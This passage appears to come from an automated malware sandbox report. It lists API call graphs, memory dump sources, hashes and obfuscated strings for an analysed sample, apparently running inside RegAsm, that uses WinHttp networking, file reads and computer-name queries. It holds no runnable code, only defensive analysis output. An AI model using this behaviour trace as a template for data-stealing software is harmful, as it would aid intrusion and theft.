                                                                      • LeaveCriticalSection.KERNEL32(F3D820D6,?,00000000,?,?,?,?,F3D820D6), ref: 6F0B772A
                                                                        • Part of subcall function 6F109BB5: _malloc.LIBCMT ref: 6F109BCF
                                                                        • Part of subcall function 6F0B6D40: _rand.LIBCMT ref: 6F0B6DEA
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave$_malloc_rand
                                                                      • String ID:
                                                                      • API String ID: 119520971-0
                                                                      • Opcode ID: 5fa8edbaaf870058a6a463daf76c654ce14e60b95b64891a4be86c0f3ed93e74
                                                                      • Instruction ID: cf8abc853b11b29b582d6e34b121253f6809d72c61b34ebf0fa6cb388155b3e4
                                                                      • Opcode Fuzzy Hash: 5fa8edbaaf870058a6a463daf76c654ce14e60b95b64891a4be86c0f3ed93e74
                                                                      • Instruction Fuzzy Hash: 66218771504609AFCB10DF94CC44FDBB7BCFF41294F10462AE81697680EB71B945CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 6F0B9580 Relevance: 5.1, APIs: 4, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(?,?,?), ref: 6F0B95A9
                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 6F0B95CA
                                                                      • EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6F0B95DA
                                                                      • LeaveCriticalSection.KERNEL32(00000000,?,?,?), ref: 6F0B95FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000015.00000002.1049648852.000000006F0A1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6F0A0000, based on PE: true
                                                                      • Associated: 00000015.00000002.1049641205.000000006F0A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049749552.000000006F124000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049772507.000000006F13E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049780627.000000006F140000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049788039.000000006F141000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049794126.000000006F143000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049803413.000000006F14C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                      • Associated: 00000015.00000002.1049818570.000000006F14E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_21_2_6f0a0000_6E11.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave
                                                                      • String ID:
                                                                      • API String ID: 3168844106-0
                                                                      • Opcode ID: e9ec9a9fba271ef499c7baebbc10e95c58e33f3f3e787cac473a3bd3437cc1da
                                                                      • Instruction ID: 92e16627726ee8fe7bc70b08ce756e0467b4d546fb12327c43d93733dbd42d9b
                                                                      • Opcode Fuzzy Hash: e9ec9a9fba271ef499c7baebbc10e95c58e33f3f3e787cac473a3bd3437cc1da
                                                                      • Instruction Fuzzy Hash: D0116D32904518AFCB00CF99E880EDEF7B8FF61220B11419AE51597611DB32FA91CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:5.9%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:3.7%
                                                                      Total number of Nodes:513
                                                                      Total number of Limit Nodes:11
                                                                      execution_graph 34192 43f0c0 5 API calls __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 34175 41bc45 105 API calls 33783 402748 33784 40275b 33783->33784 33789 40869c 33784->33789 33786 4027a8 33788 402767 33788->33786 33793 401bff 15 API calls _strlen 33788->33793 33790 4086fe 33789->33790 33791 40871d 33789->33791 33792 4532ef 15 API calls 33790->33792 33791->33788 33792->33791 33793->33788 34209 45ff4e 42 API calls __wfreopen_s 34177 45184b 7 API calls __wsopen_s 34233 4513cb FreeLibrary 34210 43e54c GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 33528 43e3d0 33529 43e3dc ___scrt_is_nonwritable_in_current_image 33528->33529 33554 43e67b 33529->33554 33531 43e3e3 33532 43e536 33531->33532 33543 43e40d ___scrt_is_nonwritable_in_current_image _unexpected ___scrt_release_startup_lock 33531->33543 33573 43e955 4 API calls 2 library calls 33532->33573 33534 43e53d 33566 4484d6 33534->33566 33538 43e54b 33539 43e42c 33540 43e4ad 33562 43e8ce GetStartupInfoW __fread_nolock 33540->33562 33542 43e4b3 33563 42dcb6 33542->33563 33543->33539 33543->33540 33569 448520 41 API calls 3 library calls 33543->33569 33555 43e684 33554->33555 33575 43eb78 IsProcessorFeaturePresent 33555->33575 33557 43e690 33576 43f082 10 API calls 2 library calls 33557->33576 33559 43e695 33560 43e699 33559->33560 33577 43f0a1 7 API calls 2 library calls 33559->33577 33560->33531 33562->33542 33578 42dc48 33563->33578 33679 44868c 33566->33679 33569->33540 33573->33534 33574 4484ec 23 API calls _unexpected 33574->33538 33575->33557 33576->33559 33577->33560 33583 40a878 33578->33583 33580 42dc50 33582 42dcab 33580->33582 33597 41e91b 33580->33597 33584 40a89f ___std_exception_copy 33583->33584 33585 40aae0 33584->33585 33586 40b3d7 FindCloseChangeNotification 33584->33586 33587 40b0da GetFileSizeEx 33584->33587 33588 40ab23 ReadFile CloseHandle 33584->33588 33589 40abbc GetModuleFileNameW CreateFileW 33584->33589 33591 40b4ee 33584->33591 33592 40b4c1 ExitProcess 33584->33592 33596 40a878 17 API calls 33584->33596 33602 44c77c 33584->33602 33585->33584 33590 40b528 17 API calls 33585->33590 33595 40a878 17 API calls 33585->33595 33586->33584 33587->33584 33588->33584 33589->33584 33590->33585 33591->33580 33595->33585 33596->33584 33612 41de1f 33597->33612 33599 41e9f2 33599->33580 33600 41e929 33600->33599 33601 41ea15 97 API calls 33600->33601 33601->33600 33605 4529a4 33602->33605 33606 44c794 33605->33606 33607 4529af RtlFreeHeap 33605->33607 33606->33584 33607->33606 33608 4529c4 GetLastError 33607->33608 33609 4529d1 __dosmaperr 33608->33609 33611 449426 14 API calls __dosmaperr 33609->33611 33611->33606 33629 41de4f __fread_nolock __fprintf_l _strlen 33612->33629 33613 41e76a WinHttpConnect 33613->33629 33614 41e861 WinHttpSendRequest 33614->33629 33615 41e42c WinHttpReceiveResponse 33615->33629 33617 41e4fa WinHttpCloseHandle 33617->33629 33618 41e711 WinHttpCloseHandle 33618->33629 33621 41dfdb WinHttpOpen 33621->33629 33622 41e8f8 33622->33600 33623 41e8b5 33642 41bfbd 108 API calls 33623->33642 33624 41e1c3 WinHttpCloseHandle 33624->33629 33627 41debe WinHttpOpenRequest 33627->33629 33629->33613 33629->33614 33629->33615 33629->33617 33629->33618 33629->33621 33629->33622 33629->33623 33629->33624 33629->33627 33631 4139a5 33629->33631 33634 44cb2f 33629->33634 33638 418b75 105 API calls 33629->33638 33639 41ad23 78 API calls __fread_nolock 33629->33639 33640 419bc3 47 API calls 33629->33640 33641 41bc9c 46 API calls 33629->33641 33643 44ce81 33631->33643 33635 44cb42 __wfreopen_s 33634->33635 33667 44cd6e 33635->33667 33637 44cb5a __wfreopen_s 33637->33629 33638->33629 33639->33629 33640->33629 33641->33629 33642->33622 33644 45b797 33643->33644 33645 45b7a4 33644->33645 33646 45b7af 33644->33646 33656 4532ef 33645->33656 33647 45b7b7 33646->33647 33654 45b7c0 _unexpected 33646->33654 33649 4529a4 __freea 14 API calls 33647->33649 33652 4139b8 33649->33652 33650 45b7c5 33663 449426 14 API calls __dosmaperr 33650->33663 33651 45b7ea RtlReAllocateHeap 33651->33652 33651->33654 33652->33629 33654->33650 33654->33651 33664 452ce0 EnterCriticalSection LeaveCriticalSection _unexpected 33654->33664 33657 45332d 33656->33657 33662 4532fd _unexpected 33656->33662 33666 449426 14 API calls __dosmaperr 33657->33666 33658 453318 RtlAllocateHeap 33660 45332b 33658->33660 33658->33662 33660->33652 33662->33657 33662->33658 33665 452ce0 EnterCriticalSection LeaveCriticalSection _unexpected 33662->33665 33663->33652 33664->33654 33665->33662 33666->33660 33668 44cd81 33667->33668 33669 44cd85 33668->33669 33671 44cdad 33668->33671 33676 452c03 29 API calls 2 library calls 33669->33676 33674 44cdd2 33671->33674 33677 44cba3 43 API calls 3 library calls 33671->33677 33675 44cda3 33674->33675 33678 452c03 29 API calls 2 library calls 33674->33678 33675->33637 33676->33675 33677->33674 33678->33675 33680 4486b9 33679->33680 33681 4486cb 33679->33681 33706 448555 GetModuleHandleW 33680->33706 33691 44880e 33681->33691 33684 4486be 33684->33681 33707 448598 GetModuleHandleExW 33684->33707 33686 43e543 33686->33574 33689 44871d 33692 44881a ___scrt_is_nonwritable_in_current_image 33691->33692 33713 4518bd EnterCriticalSection 33692->33713 33694 448824 33714 448723 33694->33714 33696 448831 33718 44884f 33696->33718 33699 44863c 33723 44861a 33699->33723 33702 44865a 33704 448598 _unexpected 3 API calls 33702->33704 33703 44864a GetCurrentProcess TerminateProcess 33703->33702 33705 448662 ExitProcess 33704->33705 33706->33684 33708 4485d7 GetProcAddress 33707->33708 33709 4485f8 33707->33709 33708->33709 33710 4485eb 33708->33710 33711 448607 33709->33711 33712 4485fe FreeLibrary 33709->33712 33710->33709 33711->33681 33712->33711 33713->33694 33715 44872f ___scrt_is_nonwritable_in_current_image 33714->33715 33717 448796 _unexpected 33715->33717 33721 4490f1 14 API calls 2 library calls 33715->33721 33717->33696 33722 4518d4 LeaveCriticalSection 33718->33722 33720 448702 33720->33686 33720->33699 33721->33717 33722->33720 33728 454295 6 API calls _unexpected 33723->33728 33725 44861f 33726 448624 GetPEB 33725->33726 33727 448636 33725->33727 33726->33727 33727->33702 33727->33703 33728->33725 34234 4521d2 51 API calls 34237 4179e0 78 API calls __fread_nolock 34239 41d7e3 108 API calls ___std_exception_copy 34241 4023e9 46 API calls 34196 44a0e8 49 API calls 34197 4518eb GetProcessHeap 34179 43ea73 51 API calls _unexpected 34211 452574 LeaveCriticalSection _unexpected 34198 43e4f1 14 API calls 34200 4518fd 16 API calls __dosmaperr 34213 45317e 75 API calls 3 library calls 34201 441af8 7 API calls ___scrt_uninitialize_crt 34214 41bb7f 118 API calls 2 library calls 34181 448805 41 API calls _unexpected 33729 44a000 33742 457a3a GetEnvironmentStringsW 33729->33742 33731 44a011 33732 44a017 33731->33732 33733 44a023 33731->33733 33734 4529a4 __freea 14 API calls 33732->33734 33749 44a114 33733->33749 33736 44a01d 33734->33736 33738 4529a4 __freea 14 API calls 33739 44a047 33738->33739 33740 4529a4 __freea 14 API calls 33739->33740 33741 44a04d 33740->33741 33743 457a49 33742->33743 33744 457a4b 33742->33744 33743->33731 33745 4532ef __fread_nolock 15 API calls 33744->33745 33746 457a60 __fprintf_l 33745->33746 33747 4529a4 __freea 14 API calls 33746->33747 33748 457a7a FreeEnvironmentStringsW 33747->33748 33748->33731 33753 44a133 33749->33753 33752 44a17b 33754 4529a4 __freea 14 API calls 33752->33754 33753->33753 33771 454ab0 33753->33771 33770 44a02a 33754->33770 33755 44a1fa 33756 4529a4 __freea 14 API calls 33755->33756 33756->33770 33757 454ab0 _unexpected 14 API calls 33761 44a185 33757->33761 33758 44a20a 33779 44a0b9 14 API calls __freea 33758->33779 33761->33755 33761->33757 33761->33758 33763 44a225 33761->33763 33767 4529a4 __freea 14 API calls 33761->33767 33778 455d11 29 API calls 2 library calls 33761->33778 33762 44a210 33764 4529a4 __freea 14 API calls 33762->33764 33780 452a87 11 API calls _unexpected 33763->33780 33765 44a218 33764->33765 33768 4529a4 __freea 14 API calls 33765->33768 33767->33761 33768->33770 33769 44a231 33770->33738 33776 454abd _unexpected 33771->33776 33772 454ae8 RtlAllocateHeap 33774 44a173 33772->33774 33772->33776 33773 454afd 33782 449426 14 API calls __dosmaperr 33773->33782 33774->33752 33774->33761 33776->33772 33776->33773 33781 452ce0 EnterCriticalSection LeaveCriticalSection _unexpected 33776->33781 33778->33761 33779->33762 33780->33769 33781->33776 33782->33774 34218 43e505 24 API calls _unexpected 34219 41b106 125 API calls 33794 405f88 33818 405fa1 __fprintf_l _unexpected ___std_exception_copy _strlen 33794->33818 33795 407b93 lstrcatW 33795->33818 33796 406a91 lstrcatW 33796->33818 33797 40723e lstrcatW 33871 41eef6 33797->33871 33799 44ce81 16 API calls 33799->33818 33811 406cdf lstrcatW 33811->33818 33812 407cce 33813 407016 lstrcatW lstrcatW 33813->33818 33814 44c77c 14 API calls ___std_exception_copy 33814->33818 33815 407982 lstrcatW 33815->33818 33816 40281b 15 API calls 33816->33818 33818->33795 33818->33796 33818->33797 33818->33799 33818->33811 33818->33812 33818->33813 33818->33814 33818->33815 33818->33816 33820 406fcc lstrcatW 33818->33820 33821 402bfc 33818->33821 33836 40e568 33818->33836 33845 403e89 33818->33845 33861 402272 99 API calls 33818->33861 33862 4027de 46 API calls 33818->33862 33863 40285a 15 API calls 33818->33863 33864 4022dd 46 API calls 33818->33864 33865 402a26 46 API calls 33818->33865 33866 43b928 33818->33866 33877 40223f 46 API calls 33818->33877 33878 401241 44 API calls 33818->33878 33879 40eb3a 33818->33879 33884 44cb6c 43 API calls __wfreopen_s 33818->33884 33820->33818 33829 402c0e __fprintf_l ___std_exception_copy 33821->33829 33822 44c77c 14 API calls ___std_exception_copy 33822->33829 33824 40e568 24 API calls 33824->33829 33829->33822 33829->33824 33831 4039d1 33829->33831 33832 401241 44 API calls 33829->33832 33835 43b928 lstrcmpiW GetPEB 33829->33835 33885 401a08 46 API calls _strlen 33829->33885 33886 40129f 44 API calls 33829->33886 33887 402272 99 API calls 33829->33887 33888 402217 46 API calls 33829->33888 33889 4022dd 46 API calls 33829->33889 33890 40116d 100 API calls 33829->33890 33891 401270 100 API calls 33829->33891 33892 40248f 46 API calls 33829->33892 33831->33818 33832->33829 33835->33829 33844 40e581 __fprintf_l _unexpected ___std_exception_copy 33836->33844 33837 40d60c 23 API calls 33837->33844 33838 40ea66 NtReadFile 33838->33844 33839 40eb6b 23 API calls 33839->33844 33840 40eb27 33840->33818 33841 40e568 23 API calls 33841->33844 33842 40eb3a 23 API calls 33842->33844 33843 43b928 lstrcmpiW GetPEB 33843->33844 33844->33837 33844->33838 33844->33839 33844->33840 33844->33841 33844->33842 33844->33843 33846 403ea2 _unexpected 33845->33846 33848 40421f lstrcatW 33846->33848 33849 404678 lstrcatW lstrcatW 33846->33849 33850 4046ae 33846->33850 33851 40e568 24 API calls 33846->33851 33853 404083 lstrcatW 33846->33853 33855 40458b lstrcatW lstrcatW 33846->33855 33857 404555 lstrcatW 33846->33857 33858 41eef6 101 API calls 33846->33858 33859 403ff6 lstrcatW 33846->33859 33860 44c77c 14 API calls ___std_exception_copy 33846->33860 33893 4039e8 33846->33893 33904 40116d 100 API calls 33846->33904 33905 401a08 46 API calls _strlen 33846->33905 33906 4021c5 46 API calls 33846->33906 33848->33846 33849->33846 33850->33818 33851->33846 33853->33846 33855->33846 33857->33846 33858->33846 33859->33846 33860->33846 33861->33818 33862->33818 33863->33818 33864->33818 33865->33818 33867 43b944 33866->33867 33868 43ba15 lstrcmpiW GetPEB 33867->33868 33869 43ba04 33867->33869 33924 43d47b lstrcmpiW GetPEB __fprintf_l 33867->33924 33868->33867 33869->33818 33872 41ef10 33871->33872 33875 41efbf 33872->33875 33925 41b8c2 33872->33925 33931 41b447 33872->33931 33934 41ea15 33872->33934 33875->33818 33877->33818 33878->33818 34145 40d60c 33879->34145 33882 43b928 2 API calls 33883 40eb5c 33882->33883 33883->33818 33884->33818 33885->33829 33886->33829 33887->33829 33888->33829 33889->33829 33890->33829 33891->33829 33892->33829 33899 403a04 __fprintf_l _unexpected 33893->33899 33894 403ca4 lstrcatW 33894->33899 33895 403cc9 lstrcatW lstrcatW 33895->33899 33896 403d76 lstrcatW 33896->33899 33897 403e51 33907 4118b6 33897->33907 33898 403d45 lstrcatW lstrcatW 33898->33899 33899->33894 33899->33895 33899->33896 33899->33897 33899->33898 33901 403da2 lstrcatW lstrcatW 33899->33901 33923 402542 15 API calls _strlen 33899->33923 33901->33899 33904->33846 33905->33846 33906->33846 33920 4118da __fprintf_l _unexpected 33907->33920 33908 413336 lstrcatW 33908->33920 33909 412c9c lstrcatW 33916 4118b6 125 API calls 33909->33916 33910 412da7 lstrcatW lstrcatW 33910->33920 33911 40e568 24 API calls 33911->33920 33912 411e65 lstrcatW 33912->33920 33913 4118b6 125 API calls 33913->33920 33914 4123fd lstrcatW 33914->33920 33915 403e81 33915->33846 33916->33920 33917 40eb6b 24 API calls 33917->33920 33918 4110b8 125 API calls 33918->33920 33919 41eef6 101 API calls 33919->33920 33920->33908 33920->33909 33920->33910 33920->33911 33920->33912 33920->33913 33920->33914 33920->33915 33920->33917 33920->33918 33920->33919 33921 44c77c 14 API calls ___std_exception_copy 33920->33921 33922 43b928 2 API calls 33920->33922 33921->33920 33922->33920 33923->33899 33924->33867 33926 41b8e0 _strlen 33925->33926 33927 41b9da 33925->33927 33930 41b969 33926->33930 33941 41a772 33926->33941 33927->33872 33928 44c77c ___std_exception_copy 14 API calls 33928->33927 33930->33927 33930->33928 34128 41b45a 33931->34128 33933 41b456 33933->33872 33935 41ea33 _unexpected 33934->33935 33936 41ed1c WideCharToMultiByte 33935->33936 33937 41ec45 WideCharToMultiByte 33935->33937 33939 41edb4 33935->33939 33940 44c77c ___std_exception_copy 14 API calls 33935->33940 34144 419771 95 API calls 2 library calls 33935->34144 33936->33935 33937->33935 33939->33872 33940->33935 33944 44a3e1 33941->33944 33943 41a797 33943->33930 33945 44a3ec 33944->33945 33946 44a3fc 33945->33946 33947 44a40f 33945->33947 33990 449426 14 API calls __dosmaperr 33946->33990 33949 44a421 33947->33949 33956 44a434 33947->33956 33992 449426 14 API calls __dosmaperr 33949->33992 33950 44a401 33991 452a77 29 API calls __wsopen_s 33950->33991 33952 44a465 33982 45822e 33952->33982 33954 44a426 33993 452a77 29 API calls __wsopen_s 33954->33993 33955 44a454 33994 449426 14 API calls __dosmaperr 33955->33994 33956->33952 33956->33955 33962 44a47c 33963 44a670 33962->33963 34002 457ebd 33962->34002 34021 452a87 11 API calls _unexpected 33963->34021 33966 44a67a 33967 44a48e 33967->33963 34009 457ee9 33967->34009 33969 44a4a0 33969->33963 33970 44a4a9 33969->33970 33971 44a52e 33970->33971 33973 44a4ca 33970->33973 34019 457f50 29 API calls 3 library calls 33971->34019 34016 457f50 29 API calls 3 library calls 33973->34016 33974 44a535 33981 44a40b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 33974->33981 34020 4581da 29 API calls 2 library calls 33974->34020 33976 44a4e2 33976->33981 34017 4581da 29 API calls 2 library calls 33976->34017 33979 44a4fb 33979->33981 34018 457f50 29 API calls 3 library calls 33979->34018 33981->33943 33983 45823a ___scrt_is_nonwritable_in_current_image 33982->33983 33984 44a46a 33983->33984 34022 4518bd EnterCriticalSection 33983->34022 33995 457e91 33984->33995 33986 45824b 33987 45825f 33986->33987 34023 458777 33986->34023 34035 458282 LeaveCriticalSection _unexpected 33987->34035 33990->33950 33991->33981 33992->33954 33993->33981 33994->33981 33996 457eb2 33995->33996 33997 457e9d 33995->33997 33996->33962 34122 449426 14 API calls __dosmaperr 33997->34122 33999 457ea2 34123 452a77 29 API calls __wsopen_s 33999->34123 34001 457ead 34001->33962 34003 457ede 34002->34003 34004 457ec9 34002->34004 34003->33967 34124 449426 14 API calls __dosmaperr 34004->34124 34006 457ece 34125 452a77 29 API calls __wsopen_s 34006->34125 34008 457ed9 34008->33967 34010 457ef5 34009->34010 34011 457f0a 34009->34011 34126 449426 14 API calls __dosmaperr 34010->34126 34011->33969 34013 457efa 34127 452a77 29 API calls __wsopen_s 34013->34127 34015 457f05 34015->33969 34016->33976 34017->33979 34018->33981 34019->33974 34020->33981 34021->33966 34022->33986 34036 45828b 34023->34036 34026 4587d3 34054 458344 34026->34054 34028 4587ca 34048 4584e5 34028->34048 34029 4587d0 34031 4529a4 __freea 14 API calls 34029->34031 34032 4587de 34031->34032 34077 43ed58 5 API calls ___raise_securityfailure 34032->34077 34034 4587eb 34034->33987 34035->33984 34078 45ff94 34036->34078 34039 4532ef __fread_nolock 15 API calls 34040 4582cb 34039->34040 34041 4582d2 34040->34041 34042 45ff94 42 API calls 34040->34042 34043 4529a4 __freea 14 API calls 34041->34043 34044 4582ea 34042->34044 34045 4582b1 34043->34045 34044->34041 34046 4582f4 34044->34046 34045->34026 34045->34028 34047 4529a4 __freea 14 API calls 34046->34047 34047->34045 34049 4584f5 34048->34049 34050 457ee9 29 API calls 34049->34050 34051 458516 34050->34051 34117 452a87 11 API calls _unexpected 34051->34117 34053 458776 34055 458354 34054->34055 34056 457ee9 29 API calls 34055->34056 34057 458371 34056->34057 34058 458493 34057->34058 34060 457e91 29 API calls 34057->34060 34121 452a87 11 API calls _unexpected 34058->34121 34062 458383 34060->34062 34061 45849d 34062->34058 34063 457ebd 29 API calls 34062->34063 34064 458395 34063->34064 34064->34058 34065 45839e 34064->34065 34066 4529a4 __freea 14 API calls 34065->34066 34067 4583a9 GetTimeZoneInformation 34066->34067 34068 4583c5 34067->34068 34069 458470 34067->34069 34070 4583f9 __fread_nolock 34068->34070 34069->34029 34118 455a58 41 API calls 2 library calls 34070->34118 34072 458448 34119 458302 43 API calls 3 library calls 34072->34119 34074 458459 34120 458302 43 API calls 3 library calls 34074->34120 34076 45846d 34076->34069 34077->34034 34079 45ff9f ___scrt_is_nonwritable_in_current_image 34078->34079 34086 4518bd EnterCriticalSection 34079->34086 34081 45ffb6 34087 460082 34081->34087 34086->34081 34088 460092 34087->34088 34089 4600a8 34087->34089 34109 449426 14 API calls __dosmaperr 34088->34109 34091 4600d7 34089->34091 34092 4600be 34089->34092 34113 45fffe 42 API calls 34091->34113 34111 449426 14 API calls __dosmaperr 34092->34111 34093 460097 34110 452a77 29 API calls __wsopen_s 34093->34110 34096 4600c9 34112 452a77 29 API calls __wsopen_s 34096->34112 34099 45ffcc 34106 45fff5 34099->34106 34100 4600e8 34100->34099 34114 455d11 29 API calls 2 library calls 34100->34114 34102 460120 34102->34099 34103 46012e 34102->34103 34115 452a87 11 API calls _unexpected 34103->34115 34105 46013a 34116 4518d4 LeaveCriticalSection 34106->34116 34108 4582aa 34108->34039 34108->34045 34109->34093 34110->34099 34111->34096 34112->34099 34113->34100 34114->34102 34115->34105 34116->34108 34117->34053 34118->34072 34119->34074 34120->34076 34121->34061 34122->33999 34123->34001 34124->34006 34125->34008 34126->34013 34127->34015 34129 41b471 _strlen 34128->34129 34140 41b52b 34128->34140 34130 44c77c ___std_exception_copy 14 API calls 34129->34130 34131 41b4b6 34129->34131 34129->34140 34130->34131 34132 41b4eb 34131->34132 34135 41b5ab 34131->34135 34131->34140 34139 41b520 34132->34139 34143 4180c5 46 API calls 34132->34143 34134 44c77c ___std_exception_copy 14 API calls 34134->34140 34135->34139 34141 44add1 GetSystemTimeAsFileTime 34135->34141 34137 41b6c0 34138 41a772 46 API calls 34137->34138 34138->34139 34139->34134 34139->34140 34140->33933 34142 44ae0a __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 34141->34142 34142->34137 34143->34139 34144->33935 34155 40d61e __fprintf_l _unexpected 34145->34155 34146 40e201 lstrlenW 34146->34155 34147 40df31 NtCreateFile 34147->34155 34148 40e555 34148->33882 34148->33883 34149 40eb6b 19 API calls 34149->34155 34150 40eb3a 19 API calls 34150->34155 34151 40d60c 19 API calls 34151->34155 34152 43b928 lstrcmpiW GetPEB 34152->34155 34153 40dc0a lstrcatW lstrcatW lstrlenW 34153->34155 34154 40e568 19 API calls 34154->34155 34155->34146 34155->34147 34155->34148 34155->34149 34155->34150 34155->34151 34155->34152 34155->34153 34155->34154 34220 43e30b 58 API calls __RTC_Initialize 34159 40818a 34160 408198 34159->34160 34161 40819c 34160->34161 34163 4081f2 34160->34163 34167 4532ef 15 API calls 34163->34167 34164 4082e9 __fprintf_l 34164->34161 34165 40820a 34165->34164 34166 4532ef 15 API calls 34165->34166 34166->34164 34167->34165 34244 451f8f 15 API calls 34183 42dc09 45 API calls 34221 43f110 6 API calls 3 library calls 34185 44d010 20 API calls 34186 45e413 57 API calls 3 library calls 34156 413998 34157 44c77c ___std_exception_copy 14 API calls 34156->34157 34158 4139a1 34157->34158 34202 45849e 29 API calls __wsopen_s 34224 452121 GetCommandLineA GetCommandLineW 34225 41b325 96 API calls 2 library calls 34226 451f2f 34 API calls 2 library calls 34247 4545ae 56 API calls 2 library calls 34189 40102d 44 API calls 34228 418b2e 71 API calls 34204 4198b3 72 API calls 34249 418bb3 46 API calls _strlen 34205 4530b6 15 API calls 3 library calls 34207 45aab0 15 API calls 34168 43e3be 34173 43e949 SetUnhandledExceptionFilter 34168->34173 34170 43e3c3 34174 44ada2 29 API calls 2 library calls 34170->34174 34172 43e3ce 34173->34170 34174->34172

                                                                      Executed Functions

                                                                      Function 00405F88 Relevance: 82.2, APIs: 9, Strings: 37, Instructions: 1721stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcat$_strlen
                                                                      • String ID: oXs$ RDw$ s-$!RDw$!RDw$!s-$$E$e$$E$e$(ZSw$(ZSw$9qz$:qz$:qz$ESg$ESg$P*/$P*/$c~$c~$e2V^$i1Z$i1Z$i1Z$i4[W$i4[W$q-O5$}u?2$~u?2$~u?2$(sI$(sI$(sI$ O$ O$ O$ O$ O
                                                                      • API String ID: 3041409237-4101419157
                                                                      • Opcode ID: ce34ec0438650a4d6752f011006acb9fb2c324029543ee14956eb03ce30e7436
                                                                      • Instruction ID: 4eb95457a6bbcd6f41f0cd817fdacec5c5ff1d371135e5816826e30afcfc6f99
                                                                      • Opcode Fuzzy Hash: ce34ec0438650a4d6752f011006acb9fb2c324029543ee14956eb03ce30e7436
                                                                      • Instruction Fuzzy Hash: 8AE290B1E0460A8BDF289B58C885A7EBAB1EB54300F24453BE505FB3D0D77C9A518F5B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00433300 Relevance: 80.0, APIs: 26, Strings: 17, Instructions: 4704COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _strlen$ComputerName
                                                                      • String ID: !*2y$"*2y$D@D$D@D$D@D$D@D$Pc>2$T%3j$Tw;$U%3j$U%3j$U: $Zc$rIwhoU--Elvin$v#).#u$vTT$}C?g
                                                                      • API String ID: 2088601426-1195005190
                                                                      • Opcode ID: 85fc1cfea9c70d5fad60e128c4f0a755bf8e7bf087788e2664869f38b6004f22
                                                                      • Instruction ID: f6f200f50b4611818914cff2e2d0c8b38db0582d14488c37edb7f600239ae69d
                                                                      • Opcode Fuzzy Hash: 85fc1cfea9c70d5fad60e128c4f0a755bf8e7bf087788e2664869f38b6004f22
                                                                      • Instruction Fuzzy Hash: 9783CBB19007019BD7349F18C881A2AB7E1BB58704F24991FF59ACB791EB39ED41CB4B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00438ECD Relevance: 75.9, APIs: 17, Strings: 25, Instructions: 2366networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0043913B
                                                                      Strings
                                                                      Memory Dump Source
